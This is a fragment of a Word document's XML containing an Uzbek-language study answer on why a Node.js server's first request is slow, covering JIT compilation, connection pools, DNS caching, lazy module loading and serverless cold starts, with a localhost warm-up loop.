        <w:t xml:space="preserve">90. Nega ba'zan birinchi request sekin ishlaydi?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 necha sabab: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1. JIT (Just-in-Time) Compilation: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V8 kodni birinchi marta interpret qiladi, keyin hot path'larni compile qiladi.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Birinchi request interpret qilinadi → sekin.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Keyingi requestlar compiled kod ishlatadi → tez.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Yechim: Warm-up request:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="4A90D9" w:sz="4" w:space="5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Server ishga tushgach:
for (let i = 0; i &lt; 10; i++) {
  await fetch('http://localhost:3000/api/health');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}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2. DB Connection Pool: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Birinchi request connection yaratadi (latency).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Yechim: Pool'ni server ishganda oldindan yaratish.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3. DNS Cache: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Birinchi tashqi API chaqiruvi DNS lookup qiladi.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4. Module require():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Lazy-loaded modullar birinchi marta sekin yuklanadi.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5. Cold start (serverless):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2D2D2D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Lambda/Container "uyqu" holatidan uyg'onishi.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2026-04-13T06:07:35.812Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-04-13T06:07:35.813Z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